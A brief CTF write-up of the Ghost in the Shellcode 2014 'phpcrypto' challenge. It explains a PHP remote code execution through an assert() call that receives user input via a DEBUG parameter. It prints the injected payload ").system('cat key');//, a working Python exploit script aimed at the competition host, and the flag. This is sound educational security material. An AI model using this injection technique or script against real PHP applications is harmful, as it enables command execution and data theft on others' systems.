This one was a straight-forward PHP RCE.

We got a link to an encryption/decryption system based on PHP. After reading the homepage-html-comments we’ve found that the “API-Endpoint” had a function dump beside the customCrypto function. This one allowed us to fetch the sourcecode.

The issue was a parameter called DEBUG for the customCrypto function which allowed us to generade debug-messages with assert(). Basically assert() is the same as eval() but kills the program if the result evaluates to false.

After figuring this out the attack was simple: assert("\$message = \"The key is: $xorKey and the plaintext is: \".addslashes(\"$plaintext\");");

The $xorKey is changed from the given input earlier, but the $plaintext is as we send it. For the assertation we need a $xorKey that is valid PHP-Code, so I’ve simply used ; (encoded as X because the script will substract 29 from it).

The $plaintext then is a simple php-code: ").system('cat key');//

from requests import post

key = chr(ord(';') + 29)
plaintext = "\").system('cat key');//"

payload = 'function=customCrypto&key=%s&plaintexthex=%s&DEBUG=true' % (key, plaintext.encode('hex'))
res = post('http://phpcrypto.2014.ghostintheshellcode.com/crypto.php', data=payload, headers={'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': len(payload)})

print res.text

Flag: ThisWasAStupidTestKeyThatBecameARealBoy

by ccmndhd